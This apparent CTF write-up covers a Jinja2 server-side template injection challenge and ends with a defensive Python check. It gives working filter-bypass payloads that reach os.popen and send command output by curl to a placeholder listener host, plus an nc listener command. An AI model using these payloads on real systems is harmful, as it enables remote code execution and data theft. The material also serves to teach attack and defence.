SSTI injection: a quick write-up

The input is echoed back, and the response headers show a Python backend, so SSTI is suspected (there is also an error page and a PHP-style index.php routing scheme; whether the challenge author meant that as a decoy, I don't know). Then it is a matter of getting around the WAF. Two filters have been written: the first is an exact match on {{ and }}, so the intended route is a blind SSTI that sends the flag back to a server you control.

The second is a simple word-match filter on os and other sensitive strings. With a bit of fuzzing you find that most public PoCs do not get through it, but the filter also strips the word config from the input, and that behaviour can be used to bypass it.

Listen on your own server: nc -lvp port

List the root directory to find the flag: {% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclasconfigses__()[59].__init__.func_glconfigobals.linecconfigache.oconfigs.popconfigen('curl http://yourip:port/ -d ls / | grep flag;') %}1{% endiconfigf %}
Read the flag:
{% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclasconfigses__()[59].__init__.func_glconfigobals.linecconfigache.oconfigs.popconfigen('curl http://yourip:port/ -d cat /flag_1s_Hera;') %}1{% endiconfigf %}
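From the defender's side, the weakness of the second filter is that it deletes config in a single pass and only looks at the raw input. The following added Python check (my own example, not code from the original post or the challenge) canonicalizes the input the same way the filter does, but to a fixpoint, and then inspects both {{ }} and {% %} tags for dangerous identifiers; the payload above is reused as the sample input, and the stripped-token and identifier lists are assumptions.

```python
import re

# Both tag pairs a Jinja2 environment honours. A filter that blocks only
# "{{" / "}}" leaves statement tags untouched, which is the gap the first
# filter described above leaves open.
TAG_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)

# Tokens the second filter deletes from the input (assumed: only "config").
STRIPPED_TOKENS = ("config",)

# Identifiers that have no business in data a user submits to a template
# (assumed list; extend for your own application).
SENSITIVE = ("__class__", "__mro__", "__subclasses__", "__globals__",
             "func_globals", "popen", "__import__")

# Sample input: the list-root payload from the write-up above.
SAMPLE_PAYLOAD = ("{% iconfigf ''.__claconfigss__.__mconfigro__[2]"
                  ".__subclasconfigses__()[59].__init__.func_glconfigobals"
                  ".linecconfigache.oconfigs.popconfigen('curl http://yourip:port/"
                  " -d ls / | grep flag;') %}1{% endiconfigf %}")


def canonicalize(s: str) -> str:
    """Delete the stripped tokens until nothing changes.

    The filter deletes "config" once; inspecting that one-pass output already
    reveals the smuggled identifiers (e.g. "oconfigs" -> "os"). Iterating to a
    fixpoint makes the check independent of how many passes the filter runs.
    """
    prev = None
    while prev != s:
        prev = s
        for tok in STRIPPED_TOKENS:
            s = s.replace(tok, "")
    return s


def flag_template_input(s: str) -> list:
    """Return [(tag_excerpt, [sensitive identifiers found]), ...] for the
    canonicalized input; an empty list means nothing suspicious was seen."""
    canon = canonicalize(s)
    hits = []
    for m in TAG_RE.finditer(canon):
        body = m.group(0)
        found = [k for k in SENSITIVE if k in body]
        if found:
            hits.append((body[:40], found))
    return hits


if __name__ == "__main__":
    print(flag_template_input(SAMPLE_PAYLOAD))
```

The real fix is not a better blacklist but never passing user input to the template engine as template source; render a fixed template and supply the input as a context variable instead.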

Two good reference links I came across:
Python template injection (SSTI) in-depth study
Flask / Jinja2 template injection: some bypass techniques


Origin blog.csdn.net/a3320315/article/details/104102979